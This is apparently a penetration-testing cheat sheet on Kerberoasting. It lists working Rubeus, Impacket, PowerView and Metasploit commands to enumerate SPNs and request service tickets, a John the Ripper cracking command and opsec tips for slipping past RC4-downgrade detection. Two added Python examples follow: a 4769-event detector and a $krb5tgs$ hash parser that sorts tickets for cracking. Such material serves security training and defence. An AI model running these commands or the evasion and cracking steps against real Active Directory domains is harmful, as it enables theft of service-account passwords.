Kerberoast

Compromise any domain user, then request a TGS (service ticket) for the SPN of a service account. The ticket is encrypted with a key derived from the service account's password (for RC4 the NT hash itself), so the password can be cracked offline without touching the account or the DC again.

Kerberoast

  • Offline cracking of service account passwords. Only a valid domain account is needed: any authenticated user may request a service ticket for any registered SPN. Pre-authentication does not matter here; accounts with pre-authentication disabled are AS-REP roasting targets instead.

  • Enumerate SPNs: The attacker enumerates accounts with SPNs, which are typically service accounts. Computer accounts (names ending in $) also carry SPNs but have long random passwords, so user accounts with SPNs are the targets.

### Windows

# AD Module
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

# PowerView
Get-DomainUser -SPN

# Rubeus
.\Rubeus.exe kerberoast /stats


### Linux

# Metasploit framework
msf> use auxiliary/gather/get_user_spns

# Impacket
GetUserSPNs.py -request -dc-ip <DC_IP> <DOMAIN.FULL>/<USERNAME> -outputfile hashes.kerberoast # Password will be prompted
GetUserSPNs.py -request -dc-ip <DC_IP> -hashes <LMHASH>:<NTHASH> <DOMAIN>/<USERNAME> -outputfile hashes.kerberoast

# kerberoast: https://github.com/skelsec/kerberoast
kerberoast ldap spn 'ldap+ntlm-password://<DOMAIN.FULL>\<USERNAME>:<PASSWORD>@<DC_IP>' -o kerberoastable # 1. Enumerate kerberoastable users
kerberoast spnroast 'kerberos+password://<DOMAIN.FULL>\<USERNAME>:<PASSWORD>@<DC_IP>' -t kerberoastable_spn_users.txt -o kerberoast.hashes # 2. Dump hashes

  • Request Service Tickets: The attacker requests a service ticket (TGS) for these SPNs.

Rubeus.exe kerberoast /user:svcadmin /simple

# Opsec: /rc4opsec only roasts accounts that do not have AES enabled, so no RC4
# ticket is ever requested for an AES-capable account. That downgrade (a 4769 event
# with TicketEncryptionType 0x17 for an AES-capable service account) is the usual
# detection signature for Kerberoasting.
Rubeus.exe kerberoast /stats /rc4opsec
Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec

# Roast every roastable (non-AES) account in one go (bad opsec: a burst of 4769
# events for many different SPNs from a single user in a few seconds)
Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt
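The two opsec remarks above describe exactly what a defender keys on: an RC4 (0x17) service ticket for an account that supports AES, and one requester pulling tickets for many SPNs in a short window. The following detection logic is an added example written for this page, not code from the page or from Rubeus. It runs over a constructed set of Security Event ID 4769 records (field names follow the real 4769 event data; every value, host and account name is made up) and over a constructed stand-in for the accounts' msDS-SupportedEncryptionTypes.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# etype 23 (RC4-HMAC) as it appears in 4769 TicketEncryptionType; 0x11/0x12 are AES128/AES256.
RC4_HMAC = "0x17"

# Constructed 4769 records (not real logs). TargetUserName = requesting user,
# ServiceName = account that owns the SPN, TicketEncryptionType = etype of the ticket.
EVENTS = [
    {"time": "2024-05-01T10:00:01", "TargetUserName": "jdoe@CORP.LOCAL",   "ServiceName": "WS01$",      "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.5"},
    {"time": "2024-05-01T10:00:02", "TargetUserName": "jdoe@CORP.LOCAL",   "ServiceName": "svc_sql",    "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.5"},
    {"time": "2024-05-01T10:00:02", "TargetUserName": "jdoe@CORP.LOCAL",   "ServiceName": "svc_web",    "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.5"},
    {"time": "2024-05-01T10:00:03", "TargetUserName": "jdoe@CORP.LOCAL",   "ServiceName": "svc_backup", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.5"},
    {"time": "2024-05-01T10:00:03", "TargetUserName": "jdoe@CORP.LOCAL",   "ServiceName": "svc_legacy", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.5"},
    {"time": "2024-05-01T11:30:00", "TargetUserName": "asmith@CORP.LOCAL", "ServiceName": "svc_legacy", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.9"},
    {"time": "2024-05-01T11:31:00", "TargetUserName": "asmith@CORP.LOCAL", "ServiceName": "krbtgt",     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.9"},
]

# Constructed stand-in for msDS-SupportedEncryptionTypes: service accounts that advertise AES.
# svc_legacy is deliberately RC4-only, so an RC4 ticket for it is expected (this is the
# population /rc4opsec restricts itself to).
AES_CAPABLE = {"svc_sql", "svc_web", "svc_backup"}


def is_user_service(name):
    """Computer accounts end in '$' and krbtgt is the TGT service; neither is a roast target."""
    return not name.endswith("$") and name.lower() != "krbtgt"


def rc4_downgrades(events, aes_capable):
    """High confidence: RC4 ticket for a user-account SPN whose owner supports AES.
    Only an explicit etype downgrade (Rubeus without /rc4opsec, GetUserSPNs.py) produces this."""
    return [e for e in events
            if e["TicketEncryptionType"] == RC4_HMAC
            and is_user_service(e["ServiceName"])
            and e["ServiceName"] in aes_capable]


def rc4_user_services(events):
    """Lower confidence: any RC4 ticket for a user-account SPN. /rc4opsec stays inside this
    set, so on its own it needs a baseline, but it is the only trace that option leaves."""
    return [e for e in events
            if e["TicketEncryptionType"] == RC4_HMAC and is_user_service(e["ServiceName"])]


def roast_bursts(events, window=timedelta(minutes=5), threshold=3):
    """One requester obtaining tickets for >= threshold distinct user-account SPNs inside
    `window`: the 'roast everything to /outfile' pattern. Returns {requester: [services]}."""
    by_user = defaultdict(list)
    for e in events:
        if is_user_service(e["ServiceName"]):
            by_user[e["TargetUserName"]].append((datetime.fromisoformat(e["time"]), e["ServiceName"]))
    hits = {}
    for user, reqs in by_user.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):          # slide the window from each request
            services = {svc for t, svc in reqs[i:] if t - t0 <= window}
            if len(services) >= threshold:
                hits[user] = sorted(services)
                break
    return hits


if __name__ == "__main__":
    for e in rc4_downgrades(EVENTS, AES_CAPABLE):
        print(f"[HIGH] RC4 downgrade: {e['TargetUserName']} -> {e['ServiceName']} from {e['IpAddress']}")
    for user, services in roast_bursts(EVENTS).items():
        print(f"[HIGH] roast burst: {user} requested {len(services)} SPNs: {', '.join(services)}")
    print(f"[INFO] {len(rc4_user_services(EVENTS))} RC4 tickets for user-account SPNs in total")
```

With the constructed events, jdoe triggers both high-confidence rules (three downgrades and a four-SPN burst), while asmith's single RC4 ticket for the RC4-only svc_legacy only lands in the informational baseline, which is what a careful /rc4opsec run against one account looks like.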

  • Extract Ticket: The returned TGS is encrypted with a key derived from the service account's password: for RC4 (etype 23) the NT hash directly, for AES (etype 17/18) a salted, PBKDF2-derived key that is far slower to crack. The tools above print it in a crackable $krb5tgs$<etype>$... form.

  • Crack Password: The attacker takes the hash from the tool output (or exports the ticket from memory, e.g. with Mimikatz) and runs an offline dictionary or brute-force attack against it. The cracked value is the service account's cleartext password.

# John the Ripper (krb5tgs format); hashcat uses mode 13100 for RC4, 19600/19700 for AES128/AES256
john.exe --format=krb5tgs --wordlist=C:\AD\Tools\kerberoast\10kworst-pass.txt C:\AD\Tools\hashes.txt
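Before cracking it pays to know what the output files actually contain: which encryption type each ticket used decides the hashcat mode and the cost per guess. The parser below is an added example written for this page, not code from the page, Rubeus, Impacket or hashcat. The $krb5tgs$ layouts it accepts are the ones Rubeus and GetUserSPNs.py emit plus hashcat's own example form for AES; the hashcat mode numbers (13100 for etype 23, 19600 for 17, 19700 for 18) are real, while every sample hash, account and SPN is constructed and the edata2 fields are deliberately short.

```python
import re

HASHCAT_MODE = {23: 13100, 17: 19600, 18: 19700}
ETYPE_NAME = {23: "rc4-hmac", 17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96"}
# Checksum width in hex characters: RC4 carries a 16-byte HMAC-MD5, AES a 12-byte HMAC-SHA1-96.
CHECKSUM_HEX = {23: 32, 17: 24, 18: 24}
HEX = re.compile(r"[0-9a-fA-F]+")

# Constructed sample output (not real tickets): three well-formed lines and one broken one.
SAMPLE_HASHES = [
    "$krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/sql01.corp.local:1433*$" + "a1b2c3d4" * 4 + "$" + "deadbeef" * 8,
    "$krb5tgs$18$svc_web$CORP.LOCAL$*HTTP/web01.corp.local*$" + "0badf00d" * 3 + "$" + "cafebabe" * 8,
    "$krb5tgs$17$svc_backup$CORP.LOCAL$" + "0badf00d" * 3 + "$" + "feedface" * 8,
    "$krb5tgs$23$*broken*$zz$zz",   # malformed on purpose: missing realm/spn, non-hex fields
]


def parse_krb5tgs(line):
    """Parse one roasted ticket line into its fields, or raise ValueError.

    RC4 : $krb5tgs$23$*user$REALM$spn*$checksum$edata2
    AES : $krb5tgs$18$user$REALM$*spn*$checksum$edata2   (Rubeus / Impacket output)
          $krb5tgs$18$user$REALM$checksum$edata2         (hashcat example form, no SPN)
    """
    line = line.strip()
    if not line.startswith("$krb5tgs$"):
        raise ValueError("not a krb5tgs line")
    etype_str, rest = line[len("$krb5tgs$"):].split("$", 1)
    if not etype_str.isdigit() or int(etype_str) not in HASHCAT_MODE:
        raise ValueError(f"unsupported etype {etype_str!r}")
    etype = int(etype_str)
    if etype == 23:
        if not rest.startswith("*") or "*$" not in rest:
            raise ValueError("malformed RC4 header")
        head, tail = rest[1:].split("*$", 1)
        fields = head.split("$", 2)
        if len(fields) != 3:
            raise ValueError("RC4 header needs user$realm$spn")
        user, realm, spn = fields
    else:
        fields = rest.split("$", 2)
        if len(fields) != 3:
            raise ValueError("AES header needs user$realm$...")
        user, realm, tail = fields
        spn = None
        if tail.startswith("*"):                 # optional *spn* field
            if "*$" not in tail:
                raise ValueError("unterminated spn field")
            spn, tail = tail[1:].split("*$", 1)
    if "$" not in tail:
        raise ValueError("missing edata2")
    checksum, edata2 = tail.split("$", 1)
    if len(checksum) != CHECKSUM_HEX[etype] or not HEX.fullmatch(checksum):
        raise ValueError("bad checksum field")
    if len(edata2) < 2 or len(edata2) % 2 or not HEX.fullmatch(edata2):
        raise ValueError("bad edata2 field")
    return {"etype": etype, "etype_name": ETYPE_NAME[etype], "hashcat_mode": HASHCAT_MODE[etype],
            "user": user, "realm": realm, "spn": spn, "edata2_bytes": len(edata2) // 2}


def triage(lines):
    """Bucket parsed hashes by hashcat mode, keeping rejected lines with their reason.
    RC4 (13100) goes first: no salt and no PBKDF2, so each guess is orders of magnitude
    cheaper than for the AES modes."""
    out = {13100: [], 19600: [], 19700: [], "rejected": []}
    for line in lines:
        try:
            parsed = parse_krb5tgs(line)
        except ValueError as err:
            out["rejected"].append((line[:40], str(err)))
            continue
        out[parsed["hashcat_mode"]].append(parsed)
    return out


if __name__ == "__main__":
    buckets = triage(SAMPLE_HASHES)
    for mode in (13100, 19600, 19700):
        for h in buckets[mode]:
            print(f"hashcat -m {mode}  {h['user']}@{h['realm']}  spn={h['spn']}  ({h['etype_name']})")
    for prefix, reason in buckets["rejected"]:
        print(f"rejected {prefix}...: {reason}")
```

Run against a real hashes.txt, the 13100 bucket is what to feed john or hashcat first; AES-only results mean the account has AES enabled and the request was not downgraded, which is also the signal a defender expects to be absent when /rc4opsec was used.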
